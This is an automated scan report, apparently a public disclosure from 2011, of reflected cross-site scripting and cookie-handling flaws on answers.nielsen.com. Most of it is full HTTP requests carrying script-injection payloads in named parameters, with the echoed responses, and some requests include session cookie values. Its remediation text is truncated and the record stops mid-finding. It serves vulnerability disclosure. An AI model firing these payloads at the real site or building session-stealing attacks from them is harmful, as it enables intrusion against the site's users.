XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, answers.nielsen.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Fri Apr 29 13:04:09 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | MSRC Reference | GOOG Reference | CVE-2010-3486 | CVE-2010-3425

Loading

1. Cross-site scripting (reflected)

1.1. https://answers.nielsen.com/ [GUID parameter]

1.2. https://answers.nielsen.com/ [METHOD parameter]

1.3. https://answers.nielsen.com/ [REALMOID parameter]

1.4. https://answers.nielsen.com/ [SMAGENTNAME parameter]

1.5. https://answers.nielsen.com/ [SMAUTHREASON parameter]

1.6. https://answers.nielsen.com/ [TARGET parameter]

1.7. https://answers.nielsen.com/ [TYPE parameter]

1.8. https://answers.nielsen.com/ [name of an arbitrarily supplied request parameter]

1.9. https://answers.nielsen.com/favicon.ico [REST URL parameter 1]

1.10. https://answers.nielsen.com/gateway/authValidation.htm [REST URL parameter 1]

1.11. https://answers.nielsen.com/gateway/forgottenPassword.htm [REST URL parameter 1]

1.12. https://answers.nielsen.com/gateway/forms/login.fcc [target parameter]

1.13. https://answers.nielsen.com/gateway/logon.htm [REALMOID parameter]

1.14. https://answers.nielsen.com/gateway/logon.htm [REST URL parameter 1]

1.15. https://answers.nielsen.com/gateway/logon.htm [SMAUTHREASON parameter]

1.16. https://answers.nielsen.com/gateway/logon.htm [TARGET parameter]

1.17. https://answers.nielsen.com/gateway/support/support.jsp [REST URL parameter 1]

1.18. https://answers.nielsen.com/portal/site/answers [REST URL parameter 1]

1.19. https://answers.nielsen.com/portal/site/answers [REST URL parameter 2]

1.20. https://answers.nielsen.com/portal/site/answers [REST URL parameter 3]

1.21. https://answers.nielsen.com/portal/site/answers [name of an arbitrarily supplied request parameter]

2. SSL cookie without secure flag set

2.1. https://answers.nielsen.com/gateway/authValidation.htm

2.2. https://answers.nielsen.com/gateway/forgottenPassword.htm

2.3. https://answers.nielsen.com/

2.4. https://answers.nielsen.com/favicon.ico

2.5. https://answers.nielsen.com/gateway/forms/login.fcc

2.6. https://answers.nielsen.com/gateway/images/answers_ui/acnimage.jpg

2.7. https://answers.nielsen.com/gateway/images/answers_ui/bg_login.png

2.8. https://answers.nielsen.com/gateway/images/answers_ui/ni-chevron.gif

2.9. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg1.gif

2.10. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg2.gif

2.11. https://answers.nielsen.com/gateway/images/buttons/ni-btn-onblue-bg3.gif

2.12. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg1.gif

2.13. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg2.gif

2.14. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-onblue-bg3.gif

2.15. https://answers.nielsen.com/gateway/images/icons/icon_status_user_error_sm.gif

2.16. https://answers.nielsen.com/gateway/logon.htm

2.17. https://answers.nielsen.com/gateway/support/support.jsp

2.18. https://answers.nielsen.com/portal/site/answers

3. Session token in URL

3.1. https://answers.nielsen.com/gateway/authValidation.htm

3.2. https://answers.nielsen.com/gateway/forgottenPassword.htm

3.3. https://answers.nielsen.com/gateway/logon.htm

4. Cookie without HttpOnly flag set

4.1. https://answers.nielsen.com/gateway/authValidation.htm

4.2. https://answers.nielsen.com/gateway/forgottenPassword.htm

4.3. https://answers.nielsen.com/

4.4. https://answers.nielsen.com/favicon.ico

4.5. https://answers.nielsen.com/gateway/forms/login.fcc

4.6. https://answers.nielsen.com/gateway/images/answers_ui/acnimage.jpg

4.7. https://answers.nielsen.com/gateway/images/answers_ui/bg_login.png

4.8. https://answers.nielsen.com/gateway/images/answers_ui/ni-chevron.gif

4.9. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg1.gif

4.10. https://answers.nielsen.com/gateway/images/buttons/ni-btn-bg2.gif

4.11. https://answers.nielsen.com/gateway/images/buttons/ni-btn-onblue-bg3.gif

4.12. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg1.gif

4.13. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-bg2.gif

4.14. https://answers.nielsen.com/gateway/images/buttons/ni-btn-or-onblue-bg3.gif

4.15. https://answers.nielsen.com/gateway/images/icons/icon_status_user_error_sm.gif

4.16. https://answers.nielsen.com/gateway/logon.htm

4.17. https://answers.nielsen.com/gateway/support/support.jsp

4.18. https://answers.nielsen.com/portal/site/answers

5. Password field with autocomplete enabled

6. Cookie scoped to parent domain

7. Email addresses disclosed

8. Cacheable HTTPS response

9. SSL certificate



1. Cross-site scripting (reflected)  next
There are 21 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://answers.nielsen.com/ [GUID parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The value of the GUID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5634a"><script>alert(1)</script>c125cf0b90 was submitted in the GUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?GUID=5634a"><script>alert(1)</script>c125cf0b90&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:03 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16336


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="HTTPS://answers.nielsen.com/?GUID=5634a"><script>alert(1)</script>c125cf0b90&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%252
...[SNIP]...

1.2. https://answers.nielsen.com/ [METHOD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The value of the METHOD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e00e6"><script>alert(1)</script>565fcf8923f was submitted in the METHOD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?GUID=&METHOD=GETe00e6"><script>alert(1)</script>565fcf8923f&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:11 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16337


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="HTTPS://answers.nielsen.com/?GUID=&METHOD=GETe00e6"><script>alert(1)</script>565fcf8923f&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%252
...[SNIP]...

1.3. https://answers.nielsen.com/ [REALMOID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The value of the REALMOID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a25a"><script>alert(1)</script>df392e1f212 was submitted in the REALMOID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f49a25a"><script>alert(1)</script>df392e1f212&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:18 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16337


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="HTTPS://answers.nielsen.com/?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f49a25a"><script>alert(1)</script>df392e1f212&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969">
...[SNIP]...

1.4. https://answers.nielsen.com/ [SMAGENTNAME parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The value of the SMAGENTNAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8edb1"><script>alert(1)</script>367ffbab39d was submitted in the SMAGENTNAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ8edb1"><script>alert(1)</script>367ffbab39d&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:29 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16638


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
en" name="target" value="HTTPS://answers.nielsen.com/?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ8edb1"><script>alert(1)</script>367ffbab39d&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969">
...[SNIP]...

1.5. https://answers.nielsen.com/ [SMAUTHREASON parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The value of the SMAUTHREASON request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a468"><script>alert(1)</script>8ec6bdaac28 was submitted in the SMAUTHREASON parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=04a468"><script>alert(1)</script>8ec6bdaac28&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:36 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16337


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
t" value="HTTPS://answers.nielsen.com/?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=04a468"><script>alert(1)</script>8ec6bdaac28&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969">
...[SNIP]...

1.6. https://answers.nielsen.com/ [TARGET parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The value of the TARGET request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d99"><script>alert(1)</script>0f9377e61b0 was submitted in the TARGET parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522c3d99"><script>alert(1)</script>0f9377e61b0&TYPE=33619969 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:44 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16337


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
bc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522c3d99"><script>alert(1)</script>0f9377e61b0&TYPE=33619969">
...[SNIP]...

1.7. https://answers.nielsen.com/ [TYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The value of the TYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5da7"><script>alert(1)</script>1299acfabc0 was submitted in the TYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?GUID=&METHOD=GET&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969d5da7"><script>alert(1)</script>1299acfabc0 HTTP/1.1
Host: answers.nielsen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:51 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16337


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
1b7-05e50a27c0f4&SMAGENTNAME=-N/X3w2PnaN8cBlony5gQcMZ%252b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&SMAUTHREASON=0&TARGET=%2522%2520onmouseover%253dprompt%2528953878%2529%2520bad%253d%2522&TYPE=33619969d5da7"><script>alert(1)</script>1299acfabc0">
...[SNIP]...

1.8. https://answers.nielsen.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b46b"><script>alert(1)</script>1c160b5aac0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?1b46b"><script>alert(1)</script>1c160b5aac0=1 HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=0nh6N60SDDZ7MRyL276v4qhRPDXgTPwcf8dt3PyyLQGKqNCLGgDl!1136203667; answers_cookie=R907182360

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:55:06 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16390


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="HTTPS://answers.nielsen.com/?1b46b"><script>alert(1)</script>1c160b5aac0=1">
...[SNIP]...

1.9. https://answers.nielsen.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c60"><script>alert(1)</script>259b7aefcfc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icob0c60"><script>alert(1)</script>259b7aefcfc HTTP/1.1
Host: answers.nielsen.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221383559.1304086086.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; __utma=221383559.1502432077.1304086086.1304092102.1304096118.3; __utmc=221383559; __utmb=221383559.6.10.1304096118; USER_EMAIL_REJECT=Client ID; GATEWAYSESSION=nhMHN60QQ4HQRMGDGWJQ7fvVTzLWJHXFn99ZxqQ9lQd1h2fKRHly!563037630; answers_cookie=R907182360

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: answers_cookie=R907182360; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT
Date: Fri, 29 Apr 2011 17:57:01 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Set-Cookie: session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
ACNGPWS: 03
Proxy-Connection: keep-alive
P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16398


<html>
   <head>
       <title>Nielsen Answers</title>
       <style>

body, td {
/* SET FONT FOR ALL BROWSERS */
font-family: Arial, Helvetica, sans-serif;
...[SNIP]...
<input type="hidden" name="target" value="https://answers.nielsen.com/favicon.icob0c60"><script>alert(1)</script>259b7aefcfc">
...[SNIP]...

1.10. https://answers.nielsen.com/gateway/authValidation.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://answers.nielsen.com
Path:   /gateway/authValidation.htm

Issue detail

